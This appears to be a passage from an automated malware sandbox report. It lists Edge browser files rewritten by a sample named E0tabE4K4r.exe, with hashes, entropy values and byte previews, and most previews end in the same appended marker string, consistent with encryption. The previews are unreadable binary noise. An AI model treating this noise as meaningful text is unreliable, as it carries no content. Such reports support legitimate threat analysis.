                                                                                                                                                  Preview:1,"fu..P....0^.....O.K....8.{...;..)..[...I..c.[..*.!.,-...<.>xy.e...L.}g.F.F.l)Xvu.3$.G%.R....1._..........!8<eF.n.!{.R.<..&.g._.!.W.T..G.......X.r8...3.|..E .qD..'.7ip...|..a.u.^o.y].p'`{.bO....:aqe.o<.............8......+...;...+...'e...h.*.w..R`DV..ne.;.M.1..q..h."...9..o.u..e.Y..{!w.am.c..0>...\....Q..%@8........Jx...=d.....w......#c.......7....F....d _...y.X......p..:...,....PE..L(...?.Wa...0^......@.hM....y.).[....@..\9.v..2...S4....D.e..l.4....}.4...;s.{Y........C......am...../>I.p.(.Y..(...t@h.l... N^A............_.4 B..Bl.V7a.HO.s.*.!...i..D.x.....I.e..@..!fnBS$.i$>..&..?....f.V.6.L...K...z;.XD...!....u."K.wd.Ad...zE..U.Pp..T.r%.&@.....B...W....b..G*.....q?.....7.Q..R.....i.0.....G.vm:.......?fSZM@.?..[..,.d..q....;W.}....9..}.....r.h.>..ZCnr...)......%.&.>.....O.M4..Ng..Y.7..y.7.,Z.->4.... L......:.Y.#........\.+........r=../..S..bo D...Q.....4......\..[R..Q0....*..E.S....N..ZW..U5Y......R....haRLE...U2L.....J..A.^.p...e?c....8.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent\1.0.0.8\manifest.fingerprint

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):400
                                                                                                                                                  Entropy (8bit):7.390958550263166
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:nsCrDXA2OoR5PeehIJOlhp4BeLu15SUdNcii9a:sCrDX1HBZjpuO2bD
                                                                                                                                                  MD5:8AE9269D63A45A60489F71E17DCAC439
                                                                                                                                                  SHA1:16A0A325C6DDA45ADDB2A72419B609B71B750B68
                                                                                                                                                  SHA-256:EF8B3C30976B98A708D1D13E4406A3065D82A6B32338F8F3B985613261469138
                                                                                                                                                  SHA-512:82946AB87AA9C4BE36B7B06681019EB2186201AD64A40B587475AD6BD8304E0A7240BAA05044D20552BDD3D48538EDAD21C2969A0AEACB5A08555C7AAA16AAF4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:1.8BF..~.~3.{..q.k.....v...B..;..iA2LK".P....S....D.j.Kq....R..C...&.O.gv?.....@..T.Y....[.........l5.d.pP...R!q.#... %.......6|K...+.....<.c?..W......1.o..S.g3LG[.].......XQu..23f.=..#k..V]."3./.3....P....xBC-.6.......*{...d~...........+v..G32..e..R...6.E.<.1.Xm.cS.v..`.U......y...P.P&+....H........vt.tWA.SmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent\1.0.0.8\manifest.json

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):468
                                                                                                                                                  Entropy (8bit):7.412392487001743
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:7/PlUZhOALglnR9KlYb3T7P9Wiw9RNhGhM5SUdNcii9a:bPlUeA6R9KC3dwzW2bD
                                                                                                                                                  MD5:FF90EEF0AAE68C52CD313C7E6E744AFD
                                                                                                                                                  SHA1:F9D92F7D3C5743BCF709C9A6AE35ACE02B991D40
                                                                                                                                                  SHA-256:EDF687CC4611F6DA1243E533CFB055B137A41D95177DD5961BEC5D683D13E6E0
                                                                                                                                                  SHA-512:9C392EBD517365552B25B9548EF9374FCAD9B5774BE4935CA7DCE9A689F118159708027B1FA59735A19DAD967892D1416B44F8C245897039D96EC2A77F3B1008
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:{.. .Ra.e...].*yF..y:$Y...g.n.R..sm.znM....$.TW.S..#.....C...q.s.a.._......_3..8.D.).....I..p.'y....B.\VP..P. ..4.N.w.f.).._.r.f0QW.Z.|T#.4&.....s.a...kf....dW.mW!!..E....T3.5.8.I.......V....Nx..O=|i..R...I..8.....h.mq.v.S.3."H.|..]J.....d.mu.\h...... .........:.....!)y.F..*r..d.c.|...........{}7ta.|.W.1.q..`90...E........?....4J{. a...A."F).....i..x.v.T.....-...L...umMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent\1.0.0.8\protocols.json

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3498
                                                                                                                                                  Entropy (8bit):7.947756798388418
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:XN/nXsKor6ZLIQ1ZGlfJYXTFacGjSknt5NIS24ewXehWWEqwD6b7Bu2RbBrVuo+D:9/ncKoY+lCgcGW+5lNehWWlbtpjrVI
                                                                                                                                                  MD5:7B26CD55015FC54CE729AD69CCDEB139
                                                                                                                                                  SHA1:8512413A3F980C073F09A1CF69D6127A846E3A02
                                                                                                                                                  SHA-256:B9B492D9692D566CE701277D6FD73256D900DBAB03919ECC50F14FA2653565A4
                                                                                                                                                  SHA-512:C014A49549B7118E90B28C0EFD594599502F7CF4BFFE5FB7743F520ADA5FD563D82338DC4F081FD2F42434CC1CCC46741991BB5E61323DC21F15A1C3041B93BB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:{.. ..U..$H...w.7J...E..{../R.'.E.d...z...9...?~xR ...hv/..J..)..P..4....:~.E..:^>}..p.@.'u'.Ey.. ..c7@*.....&..Yb.".JV.!m...p ..j;.J.s7.5.........6...s..{..........u:9.5.l.d_.Q.E.....C0.u....=*v./..*.P..@5%.....[...st...5.T.8X...^..Le.m/."T..;\fI.n..rN..2P$...A".....v"..R6...\1........<\.$....g...a.cWKV..P....0>.^F............Fr8h..$.Z@.o...v'uq^.X.a.....A..u..Fe*>....9y...+..3.I.j.*|.....C..+@......P......-z.w....p.9.;m.H..L.F.f.q...y.....**..c....k!...._M.CvO].C..<..4?.....A.3.a.Tt.riV....q.!.pe*..F.I.v<....).2$.X...d..,9LRn.n.........L. .&.....5.x......{.!....,:...7.#.~6&....0.2u.y.q^"...3.l.7~..rEs...*.NO:j.!....m^.......$.:..6.1.......P..ndg.mv.4...i...$a...wu.G....Fq....&..$.1....&u..E.=.%A5.T.....b.7.m)..(w).s.iF.%}h6.+./s..+...e.....G.+FJ.cD..'..%S..T...>.e...@.D.e..a.k....Hg.UK.Q(.uBu.G.....!..m.......h.......\..?.I..?oL.G..@z....."{........8...cU..=6.Bm._B7.Z.I.]....s.-.E_....^A.T\F.....L._..v...Ez..H.j...k#.!....nw.J...k.'7".

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8\edge_autofill_field_data.json

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):218058
                                                                                                                                                  Entropy (8bit):7.081908685713762
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6144:EnLUE2SB3A4AKi/MeZtXkwSe83XXp5gbw1t0FG1Irw:DErLStgXXp5octN3
                                                                                                                                                  MD5:846EC040AE305EF2BCFEC7D05B70EE31
                                                                                                                                                  SHA1:FB180928310F3FA6D2834C7CED1E9C4A873EF13F
                                                                                                                                                  SHA-256:C1381A8E4B19F8EBE18570C588B4523D49CF95403B9F6EA838E6E5733DCC8394
                                                                                                                                                  SHA-512:1B9E83F341CC7493BC2997965EA04CB38EA707485ECC1A06E67377CD9193012F47AF5A68279AC67EE8BA6B75CF277F7EF6F321A123AA17FD05FF13506BDF9D09
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:{. .%..[.......E[..^^u..X?Se.Rg............c.N...>-......Jm...#.........kO..Q.f.(._o.Hl:.G.h..+i./...b..l../......[.....[.H..{..s..e...;...".....tA...bp.a..N....W.ma...>eh..Qmgj].....qdb4T&..fs6;/..)..M..h1TGJ^F....;]..8.L..Y(.v.......I..*.......\.di5N.0]...I..V.....:.h....=5.7h...%.w..2..-Ur.y.O........]...V.g...jD.-.....J..kL.G.J.9....S..;..|...\h.:...i.-.~>gNHI.....|#.AQy.4.b.r#.f&....o....hm..f..N.......FOD.$.....c..........t1.A..Dg$.%.p.........f.....X.....1...."..L.r$yb~....U.5XD`..K.x....n..........{.>7.7..>r....z......08D.........3N..'.]2y..uz.hf.O.....Aci......).E.........H`:_...[.J.....0..+...)+..aPsj$.E.~..91.. ...{Q.?^..L.....-..LT...{...I.tM..M}...H....s....M.U..%.....L...?:...lZ..x$R..+.a.8.........q.~CN.t.....~^.3.;....f...*......S......X..t.u...a..e...~....}1..n../..+U.F..*...."x../w..!g....k.r...&!.[JA.r..0.....%3+m...~P...gr....N..nl`...E.B.9W<.N.V.<\z.....U.,..KS3.b.%5...i..W...I.g0...j.+....YZ2.;.D......d.*|F...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8\edge_autofill_global_block_list.json

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):4729
                                                                                                                                                  Entropy (8bit):7.961397263440325
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:chseeq/XhnNKIPxKRowsFwSeoEvafAknk07yRY59GgnhYrDu8JlP+chS1JM8:chuqJnN3PIRowmxdEvafvkLG9GnrDPVS
                                                                                                                                                  MD5:FE53B38BED4094572DE9CD349CBC404B
                                                                                                                                                  SHA1:0E984ECCC6CF227714291053ACD832EE3A35677B
                                                                                                                                                  SHA-256:4EFFEAC41337C7A5B8B57553418827049A89EFFA36F8869A7A242723BB3995BC
                                                                                                                                                  SHA-512:F184947373BE1B77C95D20DDB7487CAD8A7FD1D0D8D7353F72BD94EDEFF7C603E6E273A203E29747CCBEA03E00A0B465100449BF80586E51080B27848EB6F720
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:{.."g.YM..S=W.X....{..x....{LD.aD....nB.".......3...w...{....1...+lw.........SH...%.....G.......u...........J..;.H.MR.=.\|k..[1-_.N...(....H.d...7%...~.+..../2.).......pN._.IH..mG..w?..E;......!.....j..;.J.e8..t..4N.b.N.....z.<..>.'...P..%.....8......P.RT]...!L.bnZ..CC.2.#DI.\...7......O5.e..t.Z`... ...X..Y..uJvE...M..N4.Gw.1!......x.5/B.7....._.\...RJE.~.D.:j~.)..K..........z..C......8`O..U..K...).?.^.1>.C9.OE.....E/6.......*.@.).........ss.z.HK....I..Wc"A.......v.^s..........3FQ.W[r..|/...W2..F..|......&.,#1....j..!..p....H.x/...%..Y...X..q.%nH..f.w./.$a&:?A9.}9.Z....._1....x../1...(zE."...#.1..'.8]..FN.X.. ......H.K.. C...D...>.H~L.g.x8..XC?..W.ZY[Dx.@..<./.J...nU.....\.[c,...MFW.D.&....G.$..8~..J....A..G.@b;..B..w.F...d.ln'.'..sb~.y.D$...9..lHy. .-?}....*..D3.]u.i..e.z..j.....G........u..q....z..I:|..+...J.v..h6..m.-..+[...E..TB...zv..b......=.._.m._.=..."..p..T..yb8...]%.....DpI...L.....PK.1W..]...%.-..B!.7@....Y&...k.R.....U....g...Z#.._

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8\manifest.fingerprint

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):400
                                                                                                                                                  Entropy (8bit):7.4599249324834975
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:SUktHSD38TLgCsIu5ZwUYQSIgrO5IOILguNEQMGVJZdG5/vjKCf0Xt2fTlnIS1Wn:k9SDgYwYSaqHVJZwpjIXgTWSUdNcii9a
                                                                                                                                                  MD5:E03DB314805B14FF6BC29178F4A9A4F0
                                                                                                                                                  SHA1:D29418AB8393349716AED33CE8898E4F605F16FE
                                                                                                                                                  SHA-256:8DAB9AD723AC04B0F928E246C0EB9EB7390C83E76AB8100BEA01403A6207BC11
                                                                                                                                                  SHA-512:FEA32FBA931AD0BCF697AFF4327635DD15A8C167D203728C8BE43374F7B817E959364F7565EDE591070DE497186AE398D3A2C8780FFEE29F97B1AD586D2E732F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:1.1EDD...M...wHV....&`..d....}.w.C]..#.J.h{.S.......}hO.y~.n..R...I....I..A..8?....1...PZ...rn#.%@...q1...[...M...}.S4.......)..o.K.v.eU.7.....h.....H..E.$...ty...h7/.?.....xa.+...(E.=S.... 2?..>.._T..c....)../ZZ...._T}...#.E...D.#...v*..{...NI..,...I....0....O....l.9N...].T._{...5#^.......|g..O"3(k..sf...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8\manifest.json

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):452
                                                                                                                                                  Entropy (8bit):7.467406475048727
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:MKJDtTxtLGGP2yz1RoFohnVv9u5upGN1SUdNcii9a:MkDtb6GP2yz1SFohn59uMF2bD
                                                                                                                                                  MD5:A923B8953222004C10D4A12D0BA8F625
                                                                                                                                                  SHA1:9DE5FC924790F46F0851BA980926512C59852C07
                                                                                                                                                  SHA-256:0C9B800D748AC4D389E2545D1F3F61AA657EBCCFFE833096E97F6197DDE7148E
                                                                                                                                                  SHA-512:246C4D7BE84925FC4732EB0386F0F21641A57878EE604A246C58A4155B3AF98D756B151D2AB680EB2DF6E34CA0A0525CF781E24D91AD644F008F5E88E98B40E0
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.{./_.:.:......W.W..F.....>.Q.....eC.-...{I.=v..hHYs.a../...x...n......M=..)....A..Z:...m.2...M.dz..oC.....8.[....p..>.S..;..bg#.h.S...vS%..y..|..v..wFd{N.D*....._.jNB...x..H.\.A.*nJ......@I........M.q.NO...e....s..).<j.fLr.u...'b.N.jy........(.e?c.W...8....:..Mh.........m...0..mrxZ>.+:.Q..i8....f.(...-.M`.q...{.m..`3.J@. ...9R.'.Q...^...Q~qD...H...de.Ee.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8\regex_patterns.json

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):534
                                                                                                                                                  Entropy (8bit):7.545837881681608
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:WrFQXE18T1HvvfhLd3YcCF1IrgNLo1xBJuQFSUdNcii9a:WZQXl1X553RGKr+o1oQo2bD
                                                                                                                                                  MD5:46D1F631A27DC10B462AD2659E306419
                                                                                                                                                  SHA1:FD3DC1D5294BEB52307F0C20F2958E0DB92EE952
                                                                                                                                                  SHA-256:6C969D37A615BFFC22D993D13180E364E61104A7FC98AB8FF7DB8220BDFA2484
                                                                                                                                                  SHA-512:797EF637179637722117F71D07D4483BDBAC220F120BA054082ABB68CA305C53CB2D5FA12F51070978884CD85A59AD0B09803E81DB0174E8809E8533F5A3A206
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:{. "......U;.J....Z...X...94x..5...0..TH......2:..o].....}R.'..G...!hWxt..!I_2.......G...`..T.W.$@"j..+*s."..I...n..!..YL..Fk.........8)w.wQ...;FbG.xdm.l.{j.M.?...mq.....9..E.k.$._V..=...+......0....R2T.[."...%..Y...........U.....m......(m.........=...Oo...Z7`..I . ..e......r.j...@a.|.....v.."..o...#.&U#......-..*..?q[..K......w.\..c..hZ....(...=.......-..n.G.yR.h.A..l.VI..+D.w.\.\.^..F..}..Z...E_...%t...l.X...z..P..c.l..&OmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8\v1FieldTypes.json

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):520142
                                                                                                                                                  Entropy (8bit):6.028730075227547
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:k5PdclihQkLJsyv0ugqTUkq45CIaBkdCyDLQ8thiTmAbbWybK1:8Os2yvGgC1kkUEoiTRE
                                                                                                                                                  MD5:A3455132782B74C9AC0116B86E007631
                                                                                                                                                  SHA1:0EC474FAB17276CDF6713F82B36D38192FA6B810
                                                                                                                                                  SHA-256:1BA7F647388D020E31BD03B17FDC6096864599E929744B1110B8DCCEB0FE58DF
                                                                                                                                                  SHA-512:FFD037460B55029042595EA474C4B24A49BA46D8172FF336F6218A4566B826290F2C2A135260C8A46B4E093DFFACDDE599419602BCAAA77170863767B406D34F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:{. "..r.."N..n.2K.;..\.<.\.w..ss;N.......E....Y.+.T.t.JG.L...2.$.J[.(y.9.(........]e.m..2..+J.".8.....K......e..A.9.......N`#09S+H.j.3....^......1..i.....;~m...(~...vB...5...Z.)...{....q...g...P..........q..o r...(.......}U,..l9!&....O{... .h..0._......+zI....6....<.A....v.TB...8..9P..\Jg4.'..*.$..fLvVC..b|I.]..........v..u.a......-.MR.....*/.~...7.p.=....8.......>.Z....T.#....it.j.Ct..z..)..G......mAe...I...[..#0...dL....n...L.U.5..R._2..".x*...{.>..R.`..B.k.Es...r..2G..s@G .(.....Zyc..=..tb.....'....}....%r<..,a.\.'1d..g.....%.X...!.U..??..6..?1.q...?t.b.........-.....)........@.{d.{...`...].`.vU.'.N....|B..Ag,$b.'........gl...[.<.O.Z^9..w.#E/......"...z.}......Z.MZZ3......VWy...h..^........h....\X#.~..bS.n(H.n......&....1yd%..q.R.oJ|.,df..N....*?.. ....7R......L3L> 9..J..b/v.0n..l...%.u.6E.............$ft...1\.@..w#7.N..(....L?..W....,....,.._......m...|d..<L..<.t..0..>.T^6..+.T..@.S.......c....J..`....i.%.......I..!.1.:ZJ.?.....T...~KCGo...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\6498.2023.8.1\manifest.fingerprint

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):400
                                                                                                                                                  Entropy (8bit):7.336076880026374
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:cRnW5+yFq34k7s5+CFWfGjZWIot9BPuYVSUdNcii9a:cNWHAt+XMG9WZ42bD
                                                                                                                                                  MD5:E0CA124DAAE779042AC07C41D3DE1D3C
                                                                                                                                                  SHA1:50670C80985B9BC0FE273C054503FECFF0843258
                                                                                                                                                  SHA-256:56B227AA69001DC43CB02263FF10A05F2AD37F34D39B2059B8986948761DF1AE
                                                                                                                                                  SHA-512:9AD3B2FB553FB14C0EC03177D636AC5DB6797901C1E1235E31BC2C9A57877D30B8CBDA7A3B5050D79D4925894293F5CF41CC0411DCB8A6D711880BF54C5EB950
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:1.44Cs."c.4=k5.5u.3;>...Y.?.uS..n..O(......'P.W....j\.*F}h.JW..:x....-J`..<..<..]..s..bSA....<...l.5L...79GF.Q.3s]M....J8.g..k..G..@OE..S...XH.ZRV.iNo...Z..Z....y(.o....D @.`.D....}....fh.2O.w.y.vd..].)P2N_....w.-.ZC..........!D....u...Qt...G.sb.Qo..\..t.J..{..&..........$..G[...f.P..c.~7.nv...z.%..d.....u\mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\6498.2023.8.1\manifest.json

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):447
                                                                                                                                                  Entropy (8bit):7.488353002694913
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:5L8VT4CZoY6ixwYSe3B0fpVjaXgWa9V5TmVSUdNcii9a:PIjwX3jaXCBTh2bD
                                                                                                                                                  MD5:45B929B24B2019E1FEC2E9227E3CFF86
                                                                                                                                                  SHA1:BA14B0356E5A52A75BE5A5C2B2F4A870D94E70F4
                                                                                                                                                  SHA-256:955B59C42C1413F189B1AD716771E267C2435CF21EB942A3B1FCE4EC54A29450
                                                                                                                                                  SHA-512:40C23AAFFFB64D0B1456EA27D17581EC3A1A6A7A0596C6C0285A8D3DFC7B54BC28DA21D0A18CA9C0182EF37F3CAC268C66DA67F5462E14E385782D64D8D6F3A6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:{.. ...T.;.x.2*..g...\./..\.nE:..ba..|.vI]w.k.{Kn.._...y.T..9 .tg.d..,V..P<2D..q.7..)i.M#..=.....8...inB.....@.8..`KB..Y..n...u.;...q.....R.dW..... ..T|SFQ.....P..I....Ea.[f........"}..X..\.Z.~y.Lr.w's.5...R.:.9.R.L...=.K.R.j+..Cr..AO....e_.Q}..9.N..?{zA...a..p...m...E.....DP......n....lEj...._9.....{#v....SM>.XH.\[..t.g..B.K.C.VX..z..8...SA.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):12829
                                                                                                                                                  Entropy (8bit):7.986256457203389
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:OREg1G8G+YiU5e/pOJ20zrSwfZRgujijqy08i:Ougo8GP5yps2twf3ijqy08i
                                                                                                                                                  MD5:34A12A586756EDF9CE7927A2E1E3EAE2
                                                                                                                                                  SHA1:F9D7514EAC3027E6E9A134AAA8BB57DF28685ECB
                                                                                                                                                  SHA-256:AB13B531F5B20DB555C58359F5D4F78D633ABCBBF7759ED6D50B23094A4AB5F6
                                                                                                                                                  SHA-512:4A1FE72D151359B260513AF3088D0B807F11B7592F4291B3B713E846037191FE699986B5A20CFA6CEC3DFF2DC479E025632FEE10EA5B0764A3A757D6BADCE142
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:...m..*"...36B+OHD.o.x..y..T}.B.I...To......t..._$TY4Z.W...N.F...Z..4.d%..M{..D.@.Da%.y.&/.H.....u[......$..#..+..r.o..`p.....z..........Nn."..I0....lIs.|..(7.M.y....k.ca. ..Q.PN.........C.:....w.......Yp...'%....-}...x..L.#.Y.....$.......'......=(.:..f%%U........u<.>....W:W....^.,..01....n.Hko.gw.r...1.g.2..G.%%]Zs...*.M6r..{h.D......Q..j.)..'.uH.#G......M..+..q.K.F.hf...+6.}...*.~5..[...W..<.'z....O...p.....6.`.OpU..$g....c...":=p{4..;UBG... ..o.nn..w...w.\..?..oG.a.5.?..kya.H..5.uT...1..L.e...:...{.W.L.....Y.....7\ %}YI`.7$.k....D]........kv..$B$X....;.m...x%.&.z......f.?.y(.g..M.<.......Y...`Q.i.>|.......X...r.r..3...b....*..-?..}....fR.4o...:.".....I..d...=..%.(!.Cb..b@.v.).B.. ..^T.z.Zuc.L...n.`O.w.=..i...._FEA.r....Wk..=+<W.....X.r..._ .....aQ.>.$....~..TU...(..;x......wb...\.,&...w...<..[..(UD._.N.6Om[2.P.N..........<F.V.....k\ A.p...l....`...nSL.$...V..D!..-._i.8.....zHM.R..V(.}05:c.t-5..>.7.CD./...Ab.\.:sUp.50.........#..i....&u

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):668
                                                                                                                                                  Entropy (8bit):7.676480104416575
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:kwzoK6b0MdfuVGfNtxHVYXMJz5MIx5crWFv2s9iYswQvMHgLPZI54bN9Vl78vSUn:pEKw1dfuVGF/V0MJGIx5cyFv19iRwiMH
                                                                                                                                                  MD5:877AB96B2CF52C0DAA948D4D703F51B8
                                                                                                                                                  SHA1:C52330A94532BC7E42FA72E08BAD0D78F209E723
                                                                                                                                                  SHA-256:0C5FFF3006D72EF901CA4FDC6A916A11EF5F6138A3458E7DA0C22AA81B3A047A
                                                                                                                                                  SHA-512:831DAC5CDB31BE0822E3E11E70D9DD7BB56DB358FCCAE58ED2483579C3967972A23F89F3E244FAC7C8AD2617D758F1D7977A20D6FF6B2D07C27978302E17589B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:2023/....9$.....~'m.:......c..E.{..l+.. .....G.......+.x:..zq .U....%...$..b.).h....l.. z.....c.E`.{[@4)P....?.9.....X..qar.....R.T.UK......0@Q.w-.r..B..J5:.C.0.........2...I.....;.l/3P{./77 >.K.6....A.#..U.J..0.~..`.U...M..D.V.JA..K.)...M.y._.t..<....xG..".....a Y...H7.r.i8..Y.2.Y.W0V.....sj..04.g....G.!..Y.......c\sz..Wu>..:..D.#.-A.= -...\o.kgD...1.w....\.2....L.......x.>..4......U.5Y...*~7..E........@d.....i./...y[...{y0....?)H..<I.U.P.=.Z&|...\...d.'..s..[.7.....!.4..}..P..T(.....`...#...<.~.X.2...c{IKg.C.....)....n.....c..>.......w.m....]...pQ....l....xr...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000003.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):367
                                                                                                                                                  Entropy (8bit):7.338188229983979
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:iN5B1dGQ7K3pUicExlWVuYlO2qT70p/EJqqfOYEQB03EBXJx/6InIS1WdNcii96Z:i5N1+3uijby2D70p/H2BOEdMSUdNciik
                                                                                                                                                  MD5:40625ED97E1B9B29C10998938FE57FDE
                                                                                                                                                  SHA1:C0373E8E1E71ACD8818076EDC59158C3823DCAD2
                                                                                                                                                  SHA-256:36F5812238EC9AE02147F594A9B527FC273F74808EA1638D44DECB9ED0B0665C
                                                                                                                                                  SHA-512:9D9391E1FCDAAB3E2C8805600E1053AE0C0C9CC4904B83A3B4079A75134BA0F53A2191BE80C1EF4EE824FBF156B252044B95094EDD368E1DB4B9B906B1BC36BF
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:...m...U.....A.O........Eg.X...fUl....f-<)A.8>....]r>1.].... ...j.....8....i.....:...2..'.>....[....8..p.P9..r...ry*..."2..2....*..3 ).f.........C...B.....]5iZ..f.~o....XvY.,.^....2.g.'e..b..qf..../h.m..y....lx...uE.C.W_#}CZ(P..g.....GPU.'}..;fE.r.o...".....%...~.CD.kw..KmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):677
                                                                                                                                                  Entropy (8bit):7.625456965838524
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:kMHuYbnkK3iXqTWFvv4U6wzVJPe7aQesy43caLKTioCJJIyFm5m3fiFSUdNcii9a:XuYP37q1AUFVJ2OQzkTRCvcAX2bD
